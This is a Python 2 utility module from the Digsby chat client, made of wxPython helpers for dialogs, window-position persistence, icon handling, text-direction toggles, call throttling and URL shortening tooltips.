wx.TopLevelWindow.ToggleOnTop = ToggleOnTop
class FocusTimer(wx.Timer):
def __init__(self, draw = False):
wx.Timer.__init__(self)
self.draw = draw
def Notify(self):
c = self.last_focused = wx.Window.FindFocus()
r = c.ScreenRect if c is not None else wx.Rect()
print 'wx.Window.FindFocus() ->', c, 'at', r
if self.draw:
dc = wx.ScreenDC()
p = wx.RED_PEN
p.SetWidth(4)
dc.SetPen(p)
dc.SetBrush(wx.TRANSPARENT_BRUSH)
dc.DrawRectangleRect(r)
def trackfocus(update_ms = 2000, draw = False):
t = FocusTimer(draw = draw)
t.Start(update_ms)
return t
#
# patch hcenter and vcenter methods into wxRect for centering images/rectangles
#
def VCenter(rect, img):
return rect.y + rect.height / 2 - img.Height / 2
def HCenter(rect, img):
return rect.x + rect.width / 2 - img.Width / 2
def VCenterH(rect, h):
return rect.y + rect.height / 2 - h / 2
def HCenterW(rect, w):
return rect.x + rect.width / 2 - w / 2
def CenterPoint(rect, pt):
w, h = pt
return rect.x + rect.HCenterW(w), rect.y + rect.VCenterH(h)
wx.Rect.VCenter = VCenter
wx.Rect.HCenter = HCenter
wx.Rect.VCenterH = VCenterH
wx.Rect.HCenterW = HCenterW
wx.Rect.CenterPoint = CenterPoint
Image.Image.Width = property(lambda image: image.size[0])
Image.Image.Height = property(lambda image: image.size[1])
class progress_dialog(object):
'Threadsafe progress dialog.'
def __init__(self, message, title):
self.stopped = False
# callback to the GUI thread for dialog creation
wx.CallAfter(self.create_dialog, message, title)
def create_dialog(self, message, title):
# dialog will not have a close button or system menu
self.dialog = d = wx.Dialog(None, -1, title, style = wx.CAPTION)
d.Sizer = s = wx.BoxSizer(wx.VERTICAL)
self.gauge = wx.Gauge(d, -1, style = wx.GA_HORIZONTAL)
s.Add(wx.StaticText(d, -1, message), 0, wx.EXPAND | wx.ALL, 10)
s.Add(self.gauge, 0, wx.EXPAND | wx.ALL, 10)
self.timer = wx.PyTimer(self.on_timer)
self.timer.StartRepeating(300)
self.gauge.Pulse()
s.Layout()
d.Fit()
d.CenterOnScreen()
d.Show()
def on_timer(self):
if self.stopped:
self.dialog.Destroy()
self.timer.Stop()
del self.dialog
del self.timer
else:
self.gauge.Pulse()
def stop(self):
self.stopped = True
def yes_no_prompt(title, text, default = True):
flags = wx.NO_DEFAULT * (not default)
result = wx.MessageBox(text, title, style = wx.YES_NO | flags)
if result == wx.YES:
return True
elif result == wx.NO:
return False
else:
return None
def ShowImage(b, title = ''):
'''
Displays the given wxImage, wxBitmap, PIL image, or skin region on screen
in a frame.
'''
title = title + ' ' + repr(b)
b = getattr(b, 'WXB', b)
f = wx.Frame(None, title = title, style = wx.DEFAULT_FRAME_STYLE | wx.FULL_REPAINT_ON_RESIZE)
if isinstance(b, wx.Bitmap):
f.SetClientRect((0, 0, b.Width, b.Height))
def paint_bitmap(e):
dc = wx.AutoBufferedPaintDC(f)
dc.Brush, dc.Pen = wx.CYAN_BRUSH, wx.TRANSPARENT_PEN
dc.DrawRectangleRect(f.ClientRect)
dc.DrawBitmap(b, 0, 0, True)
f.Bind(wx.EVT_PAINT, paint_bitmap)
f.SetBackgroundStyle(wx.BG_STYLE_CUSTOM)
elif isinstance(b, wx.Colour):
f.SetBackgroundColour(b)
f.SetClientRect((0, 0, 200, 200))
else:
f.SetClientRect((0, 0, 200, 200))
def paint_skinregion(e):
dc = wx.AutoBufferedPaintDC(f)
dc.Brush, dc.Pen = wx.WHITE_BRUSH, wx.TRANSPARENT_PEN
dc.DrawRectangleRect(f.ClientRect)
b.Draw(dc, f.ClientRect)
f.Bind(wx.EVT_PAINT, paint_skinregion)
f.SetBackgroundStyle(wx.BG_STYLE_CUSTOM)
f.CenterOnScreen()
f.Show()
# allow ".Show()" on any image or color object to display it on screen
Image.Image.Show = wx.Image.Show = wx.Bitmap.Show = wx.Icon.Show = wx.Colour.Show = ShowImage
def wx_prop(attrname, field='Value', set_cleanup=lambda x:x, get_cleanup=lambda x:x):
def set(self, val):
setattr(getattr(self, attrname), field, set_cleanup(val))
def get(self):
return get_cleanup(getattr(getattr(self, attrname), field))
return property(get, set)
def TextEntryDialog(message, caption = '', default_value = '', password = False, limit=1024):
style = wx.OK | wx.CANCEL | wx.CENTRE
if password:
style |= wx.TE_PASSWORD
TED = wx.TextEntryDialog(None, message, caption, default_value, style = style)
return TED
def GetTextFromUser_FixInput(val, limit):
if limit is not None:
if len(val) > limit:
print >>sys.stderr, "Data is %d bytes long, cutting to %d bytes" % (len(val), limit)
val = val[:limit]
return val
def GetTextFromUser(message, caption = '', default_value = '', password = False, limit=1024):
try:
TED = TextEntryDialog(message, caption, default_value, password, limit)
id = TED.ShowModal()
val = TED.Value
finally:
TED.Destroy()
val = GetTextFromUser_FixInput(val, limit)
return val if id == wx.ID_OK else None
def make_okcancel(name, cls):
class okcancel_class(cls):
'Wraps any component in a OK/Cancel dialog.'
dialog_style = wx.CAPTION | wx.SYSTEM_MENU | wx.CLOSE_BOX
def __init__(self, parent, id=-1,
title=None,
ok_caption = '',
cancel_caption = '',
style = dialog_style):
if title is None:
title = _("Confirm")
cls.__init__(self, parent, id, title=title, style=style)
self.OKButton = ok = wx.Button(self, wx.ID_OK, ok_caption)
cancel = wx.Button(self, wx.ID_CANCEL, cancel_caption)
if config.platform == 'win':
button_order = [ok, cancel]
else:
button_order = [cancel, ok]
self._button_sizer = hbox = wx.BoxSizer(wx.HORIZONTAL)
if hasattr(self, 'ExtraButtons'):
ctrl = self.ExtraButtons()
if ctrl is not None:
hbox.Add(ctrl, 0, wx.EXPAND | wx.ALL, 5)
hbox.AddStretchSpacer(1)
for button in button_order:
hbox.Add(button, 0, wx.ALL, 5)
vbox = wx.BoxSizer(wx.VERTICAL)
vbox.Add(hbox, 0, wx.ALL | wx.EXPAND, 7)
self.vbox = vbox
self.SetSizer(vbox)
self.Layout()
ok.SetDefault()
def set_component(self, c, border=7, line=False):
self.vbox.Insert(0, c, 1, wx.EXPAND | wx.TOP | wx.LEFT | wx.RIGHT, border)
if line:
self.vbox.Insert(1, wx.StaticLine(self), 0, wx.EXPAND | wx.LEFT | wx.RIGHT, border)
self.Layout()
@property
def ButtonSizer(self):
return self._button_sizer
okcancel_class.__name__ = name
return okcancel_class
OKCancelDialog = make_okcancel('OKCancelDialog', wx.Dialog)
OKCancelFrame = make_okcancel('OKCancelFrame', wx.Frame)
class Link(wx.HyperlinkCtrl):
def __init__(self, parent, label, url):
wx.HyperlinkCtrl.__init__(self, parent, -1, label, url)
self.HoverColour = self.VisitedColour = self.NormalColour
class NonModalDialogMixin(object):
def ShowWithCallback(self, cb=None):
self.cb = cb
self.Bind(wx.EVT_BUTTON, self.on_button)
self.Show()
self.Raise()
def on_button(self, e):
ok = e.Id == wx.ID_OK
self.Hide()
cb, self.cb = self.cb, None
if cb is not None:
import util
with util.traceguard:
cb(ok)
self.Destroy()
class SimpleMessageDialog(OKCancelDialog, NonModalDialogMixin):
def __init__(self, parent, title, message,
icon, ok_caption='', cancel_caption='',
style=None,
link=None,
wrap=None):
if style is None:
style = self.dialog_style
if link is not None:
def ExtraButtons():
self._panel = wx.Panel(self)
return Link(self, link[0], link[1])
self.ExtraButtons = ExtraButtons
OKCancelDialog.__init__(self, parent, title=title,
ok_caption=ok_caption, cancel_caption=cancel_caption,
style=style)
self.icon = icon
if icon is not None:
self.SetFrameIcon(self.icon)
p = self._panel
p.Bind(wx.EVT_PAINT, self.OnPanelPaint)
main_sizer = wx.BoxSizer(wx.VERTICAL)
sizer = wx.BoxSizer(wx.HORIZONTAL)
p.SetBackgroundColour(wx.WHITE)
static_text = wx.StaticText(p, -1, message)
sizer.AddSpacer((60, 20))
sizer.Add(static_text, 1, wx.EXPAND)
main_sizer.Add(sizer, 1, wx.EXPAND | wx.ALL, 10)
main_sizer.Add((5,5))
p.SetSizer(main_sizer)
self.set_component(p, border=0)
if wrap is not None:
static_text.Wrap(wrap)
self.Fit()
def OnPanelPaint(self, e):
dc = wx.PaintDC(self._panel)
icon = self.icon
if icon is not None:
dc.DrawBitmap(icon, 20, 14, True)
def ExtraButtons(self):
self._panel = wx.Panel(self)
class UpgradeDialog(SimpleMessageDialog):
dialog_style = SimpleMessageDialog.dialog_style & ~wx.CLOSE_BOX
def __init__(self, *a, **k):
super(UpgradeDialog, self).__init__(*a, **k)
self.SetEscapeId(wx.ID_NONE)
@classmethod
def show_dialog(cls, parent, title, message, success=None):
wx.CallAfter(cls.do_show_dialog, parent, title, message, success)
@classmethod
def do_show_dialog(cls, parent, title, message, success=None):
dialog = cls(parent, title=title, message=message)
dialog.ShowWithCallback(success)
try:
from cgui import FindTopLevelWindow
except ImportError:
print >> sys.stderr, "WARNING: using slow FindTopLevelWindow"
def FindTopLevelWindow(window):
return window if window.TopLevel else FindTopLevelWindow(window.Parent)
# wx.Window.GetNormalRect : return the non maximized dimensions of a window
try:
from cgui import GetNormalRect
except ImportError:
def GetNormalRect(win):
return win.Rect
wx.WindowClass.NormalRect = property(GetNormalRect)
wx.WindowClass.GetNormalRect = new.instancemethod(GetNormalRect, None, wx.WindowClass)
wx.WindowClass.Top = property(FindTopLevelWindow)
def edit_list(parent=None, obj_list=None, title="Editing List"):
if not isinstance(obj_list, list):
obj_list = []
diag = OKCancelDialog(wx.GetTopLevelParent(parent), title=title)
t = type(obj_list[0]) if len(obj_list) else None
textctrl = wx.TextCtrl(diag, value = ','.join([str(i) for i in obj_list]))
diag.set_component(textctrl)
textctrl.MinSize = (300, -1)
diag.Fit()
textctrl.SetFocus()
textctrl.SetInsertionPointEnd()
result = diag.ShowModal() == wx.ID_OK
if t is None:
t = int if all([s.isdigit() for s in textctrl.Value.split(',')]) else str
return result, [t(s.strip()) for s in textctrl.Value.split(',')] if len(textctrl.Value) else []
try:
import wx.gizmos as gizmos
except ImportError:
def edit_string_list(parent=None, obj_list=['one', 'two', 'three'], title="Editing List"):
log.critical('no wx.gizmos')
return edit_list(parent, obj_list, title)
else:
def edit_string_list(parent=None, obj_list=['one', 'two', 'three'], title="Editing List"):
diag = OKCancelDialog(wx.GetTopLevelParent(parent), title=title)
t = type(obj_list[0])
elb = gizmos.EditableListBox(diag, -1, title)
elb.SetStrings([unicode(elem) for elem in obj_list])
diag.set_component(elb)
return diag.ShowModal() == wx.ID_OK, [t(s) for s in elb.GetStrings()]
from wx import Color, ColourDatabase, NamedColor
from binascii import unhexlify
from types import NoneType
def get_wxColor(c):
if isinstance(c, (NoneType, Color)):
return c
elif isinstance(c, basestring):
if c[0:2].lower() == color_prefix.lower():
# a hex string like "0xabcdef"
return Color(*(struct.unpack("BBB", unhexlify(c[2:8])) + (255,)))
elif ColourDatabase().Find(c).Ok():
# a color name
return NamedColor(c)
else:
try: c = int(c)
except ValueError: pass
if isinstance(c, int):
# an integer
return Color((c >> 16) & 0xff, (c >> 8) & 0xff, c & 0xff, (c >> 24) or 255)
raise ValueError('error: %r is not a valid color' % c)
colorfor = get_wxColor
LOCAL_SETTINGS_FILE = 'digsbylocal.ini'
class MyConfigParser(ConfigParser):
def save(self):
import util
with util.traceguard:
parent = local_settings_path().parent
if not parent.isdir():
parent.makedirs()
lsp = local_settings_path()
try:
with open(lsp, 'w') as f:
self.write(f)
except Exception, e:
log.error('Error saving file %r. Error was: %r', lsp, e)
def iteritems(self, section):
return ((k, self.value_transform(v)) for k, v in ConfigParser.items(self, section))
def items(self, section):
return list(self.iteritems())
def _interpolate(self, section, option, rawval, vars):
try:
value = ConfigParser._interpolate(self, section, option, rawval, vars)
except TypeError:
value = rawval
return value
def value_transform(self, v):
import util
return {'none': None,
'true': True,
'false': False}.get(util.try_this(lambda: v.lower(), None), v)
def local_settings_path():
import stdpaths
return stdpaths.userlocaldata / LOCAL_SETTINGS_FILE
_global_ini_parser = None
def local_settings():
global _global_ini_parser
if _global_ini_parser is None:
_global_ini_parser = MyConfigParser()
lsp = local_settings_path()
try:
_global_ini_parser.read(lsp)
except Exception, e:
log.error('There was an error loading file %r. The error was %r.', lsp, e)
return _global_ini_parser
def getDisplayHashString():
'''
Returns a unique string for the current monitor/resolution configuration.
Used below in save/loadWindowPos.
The rationale is that using things like Remote Desktop can result in the
window remembering a location that won't work on a differently sized
display. This way you only position the window once on each display
configuration and be done with it.
'''
return '{%s}' % ', '.join('<(%s, %s): %sx%s>' % tuple(m.Geometry) for m in Monitor.All())
def saveWindowPos(win, uniqueId=""):
'''
Saves a window's position to the config file.
'''
cfg = local_settings()
section = windowId(win.Name, uniqueId)
if not cfg.has_section(section):
cfg.add_section(section)
if wxMSW:
placement = GetWindowPlacement(win)
# on win7, if a window is Aero Snapped, GetWindowPlacement will return
# it's "unsnapped" size. we want to save the size of the window as it
# is now, though--so grab the size from win.Rect and use that.
if cgui.isWin7OrHigher() and not win.IsMaximized() and not win.IsIconized():
placement_set_size(placement, win.Rect.Size)
cfg.set(section, 'placement', json.dumps(placement))
else:
rect = GetNormalRect(win)
sz, p = rect.GetSize(), rect.GetPosition()
for k, v in [("x", p.x),
("y", p.y),
("w", sz.width),
("h", sz.height),
('maximized', win.IsMaximized())]:
cfg.set(section, k, str(v))
cfg.save()
defSizes = {
'Buddy List': (280, 600),
'IM Window': (420, 330),
}
def windowId(windowName, uniqueId):
from common import profile
username = getattr(profile, 'username', None)
if not username:
username = getattr(wx.FindWindowByName('Digsby Login Window'), 'username', '_')
return ' '.join([windowName, uniqueId, username, getDisplayHashString()])
def placement_set_size(placement, size):
np = placement['rcNormalPosition']
right = np[0] + size.width
bottom = np[1] + size.height
placement['rcNormalPosition'] = [np[0], np[1], right, bottom]
def preLoadWindowPos(windowName, uniqueId="", position_only = False, defaultPos = None, defaultSize = None):
# save based on classname, and any unique identifier that is specified
section = windowId(windowName, uniqueId)
if defaultPos is not None:
doCenter = defaultPos == 'center'
hasDefPos = not doCenter
else:
hasDefPos = False
doCenter = False
size = defaultSize if defaultSize is not None else wx.DefaultSize#(450, 400)
pos = defaultPos if hasDefPos else wx.DefaultPosition
style = 0
try:
cfg = local_settings()
hassection = cfg.has_section(section)
except Exception:
print_exc()
hassection = False
placement = None
if wxMSW:
if hassection:
import util
with util.traceguard:
placement = json.loads(cfg.get(section, 'placement'))
if position_only:
placement_set_size(placement, size)
if hassection and not position_only:
try:
size = Size(cfg.getint(section, "w"), cfg.getint(section, "h"))
except Exception:
pass
#TODO: this isn't expected to work anymore with IM windows, needs to
#be removed once everything else is moved to use SetPalcement
#print_exc()
if doCenter:
mon = Monitor.GetFromRect(wx.RectPS(wx.Point(0, 0), size)) #@UndefinedVariable
pos = wx.Point(*mon.ClientArea.CenterPoint(size))
if hassection:
try:
pos = Point(cfg.getint(section, "x"), cfg.getint(section, "y"))
except Exception:
pass
#TODO: this isn't expected to work anymore with IM windows, needs to
#be removed once everything else is moved to use SetPalcement
#print_exc()
import util
max = util.try_this(lambda: cfg.getboolean(section, "maximized"), False) if hassection else False
if max:
style |= wx.MAXIMIZE
return dict(style = style, size = size, pos = pos), placement
def loadWindowPos(win, uniqueId="", position_only = False, defaultPos = None, defaultSize = None):
'''
Loads a window's position from the default config file.
'''
wininfo, placement = preLoadWindowPos(win.Name, uniqueId, position_only, defaultPos, defaultSize or win.Size)
if placement is not None:
SetWindowPlacement(win, placement)
else:
if not position_only:
win.SetRect(wx.RectPS(wininfo['pos'], wininfo['size']))
else:
win.Position = wininfo['pos']
# if wininfo['style'] & wx.MAXIMIZE:
# win.Maximize()
win.EnsureInScreen()
def persist_window_pos(frame, close_method=None, unique_id="", position_only = False, defaultPos = None, defaultSize = None, nostack = False):
'''
To make a frame remember where it was, call this function on it in its
constructor.
'''
def _persist_close(e):
saveWindowPos(frame, unique_id)
close_method(e) if close_method is not None else e.Skip(True)
frame.Bind(wx.EVT_CLOSE, _persist_close)
loadWindowPos(frame, unique_id, position_only, defaultPos = defaultPos, defaultSize = defaultSize)
if nostack:
frame.EnsureNotStacked()
def TransparentBitmap(size):
w, h = max(size[0], 1), max(size[1], 1)
return wx.TransparentBitmap(w, h)
def toscreen(bmap, x, y):
wx.ScreenDC().DrawBitmap(bmap, x, y)
def bbind(window, **evts):
'''
Shortcut for binding wxEvents.
Instead of:
self.Bind(wx.EVT_PAINT, self.on_paint)
self.Bind(wx.EVT_ERASE_BACKGROUND, self.on_paint_background)
self.Bind(wx.EVT_SET_FOCUS, self.on_focus)
Use this:
self.BBind(PAINT = self.on_paint,
ERASE_BACKGROUND = self.on_paint_background,
SET_FOCUS, self.on_focus)
'''
bind = window.Bind
for k, v in evts.iteritems():
bind(getattr(wx, 'EVT_' + k), v)
wx.WindowClass.BBind = bbind
def EnsureInScreen(win, mon=None, client_area=True):
mon = Monitor.GetFromWindow(win)
if mon:
rect = mon.ClientArea if client_area else mon.Geometry
win.SetRect(rect.Clamp(win.Rect))
else:
win.CentreOnScreen()
wx.WindowClass.EnsureInScreen = EnsureInScreen
def FitInScreen(win, mon=None):
'''
Like wx.Window.Fit(), except also ensures the window is within the client
rectangle of its current Display.
'''
win.Fit()
EnsureInScreen(win, mon)
wx.WindowClass.FitInScreen = FitInScreen
def build_button_sizer(save, cancel = None, border=5):
'Builds a standard platform specific button sizer.'
# Only because wxStdDialogButtonSizer.Realize crashed the Mac
sz = wx.BoxSizer(wx.HORIZONTAL)
sz.AddStretchSpacer(1)
addbutton = lambda b: sz.Add(b, 0, (wx.ALL & ~wx.TOP) | wx.ALIGN_RIGHT, border)
mac = 'wxMac' in wx.PlatformInfo
import util.primitives.funcs as funcs
if save and cancel:
funcs.do(addbutton(b) for b in ([cancel, save] if mac else [save, cancel]))
else:
addbutton(save)
return sz
_tinyoffsets = ((-1, 0), (1, 0), (1, -1), (1, 1), (-1, -1), (-1, 1))
def draw_tiny_text(image, text, outline = 'black', fill = 'white'):
image = getattr(image, 'PIL', image).copy()
# Load the pixel font.
font = load_tiny_font()
if font is None:
return image
drawtext = ImageDraw.Draw(image).text
size = font.getsize(text)
x, y = image.size[0] - size[0], image.size[1] - size[1]
if outline:
# shift the color one pixel in several directions to create an outline
for a, b in _tinyoffsets:
drawtext((x+a, y+b), text, fill = outline, font = font)
drawtext((x, y), text, fill = fill, font = font)
return image
_tinyfont = None
def load_tiny_font():
global _tinyfont
if _tinyfont == -1:
# There was an error loading the pixel font before.
return None
elif _tinyfont is None:
try:
import locale
from gui import skin
_tinyfont = ImageFont.truetype((skin.resourcedir() / 'slkscr.ttf').encode(locale.getpreferredencoding()), 9)
except Exception:
print_exc()
_tinyfont = -1
return None
return _tinyfont
#@lru_cache(10)
def add_image_text(wxbitmap, text):
return draw_tiny_text(wxbitmap, unicode(text)).WXB
def rect_with_negatives(rect, boundary):
'''
Allows rectangles specified in negative coordinates within some boundary.
Parameters:
rect: a sequence of four numbers specifying a rectangle
boundary: a sequence of two numbers, a width and height representing a BoundaryError
Returns a sequence of four numbers, a new rectangle which takes any negative
numbers from the original rectangle and adds them to the boundary rectangle.
'''
if not len(rect) == 4 or not len(boundary) == 2: raise TypeError('parameters are (x,y,w,h) and (w,h)')
ret = list(rect)
for i in xrange(len(ret)):
if ret[i] < 0:
ret[i] += boundary[i%2]
return ret
class Frozen(object):
'''
"with" statement context manager for freezing wx.Window GUI elements
'''
def __init__(self, win):
self.win = win
def __enter__(self):
self.win.Freeze()
def __exit__(self, exc_type, exc_val, exc_tb):
self.win.Thaw()
del self.win
wx.WindowClass.Frozen = lambda win: Frozen(win)
wx.WindowClass.FrozenQuick = lambda win: Frozen(win)
from wx import IconFromBitmap
GetMetric = wx.SystemSettings.GetMetric
_win7bigicon = None
def SetFrameIcon(frame, bitmap):
"Given any Bitmap/Image/PILImage, sets this frame's icon."
small_w, small_h = GetMetric(wx.SYS_SMALLICON_X), GetMetric(wx.SYS_SMALLICON_Y)
big_w, big_h = GetMetric(wx.SYS_ICON_X), GetMetric(wx.SYS_ICON_Y)
if small_w == -1:
small_w = 16
if small_h == -1:
small_h = 16
if big_w == -1:
big_w = 32
if big_h == -1:
big_h = 32
if isinstance(bitmap, wx.IconBundle):
bundle = bitmap
elif isinstance(bitmap, list):
bundle = wx.IconBundle()
for b in bitmap:
if isinstance(b, wx.Icon):
bundle.AddIcon(b)
else:
bundle.AddIcon(IconFromBitmap(b.PIL.ResizedSmaller(big_w).ResizeCanvas(big_w, big_h).WXB))
else:
small_bitmap = bitmap.PIL.ResizedSmaller(small_w).ResizeCanvas(small_w, small_h).WXB
if cgui.isWin7OrHigher():
# On Windows 7, always use the Digsby icon for the 32x32 version.
# this is so that our application icon in the taskbar always shows as the Digsby logo.
global _win7bigicon
if _win7bigicon is None:
from gui import skin
_win7bigicon = skin.get('AppDefaults.TaskBarIcon').PIL.ResizedSmaller(big_w).ResizeCanvas(big_w, big_h).WXB
large_bitmap = _win7bigicon
else:
large_bitmap = bitmap.PIL.ResizedSmaller(big_w).ResizeCanvas(big_w, big_h).WXB
bundle = wx.IconBundle()
bundle.AddIcon(IconFromBitmap(large_bitmap))
bundle.AddIcon(IconFromBitmap(small_bitmap))
frame.SetIcons(bundle)
wx.TopLevelWindow.SetFrameIcon = SetFrameIcon
def snap_pref(win):
'Makes a window obey the windows.sticky preference. (The window snaps to edges.)'
from common import profile
#needs to import snap to patch SetSnap into TopLevelWindow
import gui.snap
if profile.prefs:
linked = profile.prefs.link('windows.sticky', win.SetSnap)
def on_destroy(e):
e.Skip()
if e.EventObject is win:
linked.unlink()
win.Bind(wx.EVT_WINDOW_DESTROY, on_destroy)
else:
raise Exception('profile.prefs is empty -- cannot observe')
def setuplogging(logfilename = 'digsby-testapp.log', level=None):
import logging
if level is None:
level = logging.DEBUG
# Setup log so it's visible
logging.basicConfig(level=level,
filename=logfilename,
filemode='w')
import logextensions
console = logextensions.ColorStreamHandler()
from main import ConsoleFormatter
console.setFormatter(ConsoleFormatter())
logging.getLogger().addHandler(console)
def OverflowShow(self, switch=True, genWidth = True):
self.shouldshow=switch
wx.Window.Show(self, switch)
if genWidth: self.Parent.GenWidthRestriction(True)
def EnsureNotStacked(f, clz = None, offset = (20, 20)):
'''
Positions a top level window so that it is not directly stacked on
top of another for which isinstance(window, clz)
'''
if clz is None:
clz = f.__class__
found = True
top = GetTopLevelWindows()
pos = f.Position
while found:
found = False
for frame in top:
if frame is not f and isinstance(frame, clz) and frame.IsShown() and frame.Position == pos:
pos = pos + offset
found = True
f.Position = pos
wx.TopLevelWindow.EnsureNotStacked = EnsureNotStacked
def AddInOrder(sizer, *order, **windows):
if sizer and windows:
for key in list(order):
if key in windows:
try:
sizer.Add(*windows[key])
except Exception:
print >> sys.stderr, 'sizer', sizer
print >> sys.stderr, 'order', order
print >> sys.stderr, 'windows', windows
print >> sys.stderr, 'key', key
raise
def GetStartupDir():
import stdpaths
return stdpaths.userstartup
def ToScreen(rect, ctrl):
r = wx.Rect(*rect)
r.x, r.y = ctrl.ClientToScreen(r.TopLeft)
return r
wx.Rect.ToScreen = ToScreen
from wx import TOP, BOTTOM, LEFT, RIGHT
def alignment_to_string(a):
if a & TOP: s = 'upper'
elif a & BOTTOM: s = 'lower'
else: s = 'middle'
if a & LEFT: s += 'left'
elif a & RIGHT: s += 'right'
else: s += 'center'
return s
def prnt(*a):
"""
Strings the arguments and pieces them together, separated with spaces
The string is printed inbetween lines of 80 '='
"""
print
print '=' * 80
print ' '.join(str(i) for i in a)
print '=' * 80
if wxMSW:
# use custom rich edit alignment flags -- wxLayoutDirection doesn't work
# with rich text controls
PFA_LEFT = 1
PFA_RIGHT = 2
PFA_CENTER = 3
PFA_JUSTIFY = 4
def set_rich_layoutdirection(ctrl, align):
align = {wx.Layout_RightToLeft: PFA_RIGHT,
wx.Layout_LeftToRight: PFA_LEFT}[align]
if cgui.SetRichEditParagraphAlignment(ctrl, align):
ctrl.Refresh()
def add_rtl_checkbox(ctrl, menu):
'''
Adds a checkbox when the menu is over the main input area for toggling
a right to left reading order.
ctrl is the control currently under the mouse
menu is the menu we're updating
'''
# If we're over the main input area, add a checkbox for toggling RTL state.
item = menu.AddCheckItem(_('Right To Left'), callback = lambda: toggle_layout_direction(ctrl))
# The item is checked if RTL mode is on.
item.Check(cgui.GetRichEditParagraphAlignment(ctrl) == PFA_RIGHT)
def toggle_layout_direction(tc):
'Toggles the layout direction of a control between right-to-left and left-to-right.'
# alignment = PFA_RIGHT if cgui.GetRichEditParagraphAlignment(tc) == PFA_LEFT else PFA_LEFT
#
# if not cgui.SetRichEditParagraphAlignment(tc, alignment):
# log.warning('SetRichEditParagraphAlignment returned False')
# else:
# tc.Refresh()
tc.SetRTL(not tc.GetRTL())
else:
def add_rtl_checkbox(ctrl, menu):
'''
Adds a checkbox when the menu is over the main input area for toggling
a right to left reading order.
ctrl is the control currently under the mouse
menu is the menu we're updating
'''
# If we're over the main input area, add a checkbox for toggling RTL state.
item = menu.AddCheckItem(_('Right To Left'), callback = lambda: toggle_layout_direction(ctrl))
# The item is checked if RTL mode is on.
item.Check(ctrl.GetRTL()) #LayoutDirection == wx.Layout_RightToLeft)
def toggle_layout_direction(tc):
'Toggles the layout direction of a control between right-to-left and left-to-right.'
if tc:
tc.LayoutDirection = wx.Layout_RightToLeft if tc.LayoutDirection == wx.Layout_LeftToRight else wx.Layout_LeftToRight
tc.Refresh()
def textctrl_hittest(txt, pos=None):
if pos is None:
pos = wx.GetMousePosition()
hit, col, row = txt.HitTest(txt.ScreenToClient(pos))
return txt.XYToPosition(col, row)
class Unshortener(object):
def __init__(self, cb=None):
self.urls = {}
self.cb = cb
def get_long_url(self, url):
try:
return self.urls[url]
except KeyError:
self.urls[url] = None
def cb(longurl):
self.urls[url] = longurl
if self.cb:
self.cb()
import util.net
util.net.unshorten_url(url, cb)
def add_shortened_url_tooltips(txt):
'''
binds a mouse motion handler that detects when the mouse hovers over shortened urls,
and shows the long version
'''
def update_url_tooltip(e=None):
if e is not None:
e.Skip()
val = txt.Value
import util.net
i = textctrl_hittest(txt)
tooltip = None
for link, span in util.net.LinkAccumulator(val):
if i < span[0] or i >= span[1]:
continue
if util.net.is_short_url(link):
try:
shortener = txt._url_unshortener
except AttributeError:
shortener = txt._url_unshortener = Unshortener(lambda: wx.CallAfter(update_url_tooltip))
tooltip = shortener.get_long_url(link)
break
update_tooltip(txt, tooltip)
txt.Bind(wx.EVT_MOTION, update_url_tooltip)
def maybe_add_shorten_link(txt, menu):
import util.net
val = txt.Value
i = textctrl_hittest(txt) # TODO: what if the menu was spawned via the keyboard?
for link, span in util.net.LinkAccumulator(val):
if i < span[0] or i >= span[1]:
continue
def repl(s):
i, j = span
txt.Value = ''.join((val[:i], s, val[j:]))
if util.net.is_short_url(link):
longurl = util.net.long_url_from_cache(link)
if longurl is not None:
menu.AddItem(_('Use Long URL'), callback=lambda: repl(longurl))
menu.AddSep()
continue
@util.threaded
def bgthread():
url = util.net.get_short_url(link)
if url and val == txt.Value:
wx.CallAfter(lambda: repl(url))
menu.AddItem(_('Shorten URL'), callback = bgthread)
menu.AddSep()
break
def show_sizers(win, stream = None):
if isinstance(win, wx.WindowClass):
sizer = win.Sizer
if sizer is None:
raise ValueError('%r has no sizer' % win)
elif isinstance(win, wx.Sizer):
sizer = win
else:
raise TypeError('must pass a window or sizer, you gave %r' % win)
if stream is None:
stream = sys.stdout
_print_sizer(sizer, stream)
def _shownstr(o):
return '(hidden)' if not o.IsShown() else ''
def _print_sizer(sizer, stream, indent = '', sizer_shown_str = ''):
assert isinstance(sizer, wx.Sizer)
stream.write(''.join([indent, repr(sizer), ' ', sizer_shown_str, '\n']))
indent = ' ' + indent
for child in sizer.Children:
assert isinstance(child, wx.SizerItem)
if child.Sizer is not None:
_print_sizer(child.Sizer, stream, ' ' + indent, sizer_shown_str = _shownstr(child))
else:
stream.write(''.join([indent,
repr(child.Window if child.Window is not None else child.Spacer),
' ',
_shownstr(child),
'\n']))
_delays = defaultdict(lambda: (0, None))
def calllimit(secs=.5):
'''
Assures a function will only be called only once every "secs" seconds.
If a new call comes in while a "delay" is occurring, the function is
guaranteed to be called after the delay is over.
'''
def inner(func): # argument to the decorator: a function
@functools.wraps(func)
def wrapper(*args, **kwargs): # arguments to the original function
now = time_clock()
key = (func, getattr(func, 'im_self', None))
lastcalled, caller = _delays[key]
diff = now - lastcalled
if diff > secs:
# CALL NOW
if isinstance(caller, wx.CallLater): caller.Stop()
_delays[key] = (now, None)
return func(*args, **kwargs)
else:
# CALL LATER
if caller == 'pending':
# the wx.CallAfter hasn't completed yet.
pass
elif not caller:
callin_ms = (lastcalled + secs - now) * 1000
def later():
def muchlater():
_delays[key] = (time_clock(), None)
func(*args, **kwargs)
_delays[key] = (lastcalled,
wx.CallLater(max(1, callin_ms), muchlater))
_delays[key] = (lastcalled, 'pending')
wx.CallAfter(later)
return func
return wrapper
return inner
# TODO: move me to gui.native
GetDoubleClickTime = lambda: 600
if wxMSW:
try:
from ctypes import windll
GetDoubleClickTime = windll.user32.GetDoubleClickTime
except Exception:
print_exc()
def std_textctrl_menu(txt, menu):
menu.AddItem(_("Undo"), callback = txt.Undo, id=wx.ID_UNDO)
menu.Enable(wx.ID_UNDO, txt.CanUndo())
menu.AddItem(_("Redo"), callback = txt.Redo, id=wx.ID_REDO)
menu.Enable(wx.ID_REDO, txt.CanRedo())
menu.AppendSeparator()
menu.AddItem(_("Cut"), callback = txt.Cut, id=wx.ID_CUT)
menu.Enable(wx.ID_CUT, txt.CanCut())
menu.AddItem(_("Copy"), callback = txt.Copy, id=wx.ID_COPY)
menu.Enable(wx.ID_COPY, txt.CanCopy())
menu.AddItem(_("Paste"), callback = txt.Paste, id=wx.ID_PASTE)
menu.Enable(wx.ID_PASTE, txt.CanPaste())
menu.AppendSeparator()
